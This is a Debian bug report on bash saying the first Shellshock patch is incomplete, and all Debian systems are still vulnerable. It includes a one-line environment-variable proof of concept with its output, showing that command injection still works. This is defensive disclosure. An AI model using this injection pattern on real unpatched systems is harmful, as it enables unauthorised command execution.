Package: bash Version: 4.2+dfsg-0.1+deb7u1 Severity: critical Tags: security
As Tavis Ormandy has tweeted[0], the existing patch is not sufficient to solve the problem: vauxhall ok % dpkg -l bash | grep ^ii; rm -f echo; env X='() { (a)=>\' bash -c "echo date"; cat echo ii bash 4.2+dfsg-0.1+deb7u1 amd64 GNU Bourne Again SHell bash: X: line 1: syntax error near unexpected token `=' bash: X: line 1: `' bash: error importing function definition for `X' Wed Sep 24 23:32:32 UTC 2014 This means all Debian systems are still vulnerable, as bash is an essential package. [0] https://twitter.com/taviso/status/514887394294652929 -- System Information: Debian Release: jessie/sid APT prefers unstable APT policy: (500, 'unstable'), (500, 'stable'), (1, 'experimental') Architecture: amd64 (x86_64) Foreign Architectures: i386 Kernel: Linux 3.17-rc5-amd64 (SMP w/4 CPU cores) Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/dash Versions of packages bash depends on: ii base-files 7.5 ii dash 0.5.7-4 ii debianutils 4.4 ii libc6 2.19-11 ii libtinfo5 5.9+20140913-1 Versions of packages bash recommends: pn bash-completion <none> Versions of packages bash suggests: pn bash-doc <none> -- no debconf information -- brian m. carlson / brian with sandals: Houston, Texas, US +1 832 623 2791 | http://www.crustytoothpaste.net/~bmc | My opinion only OpenPGP: RSA v4 4096b: 88AC E9B2 9196 305B A994 7552 F1BA 225C 0223 B187
signature.asc
Description: Digital signature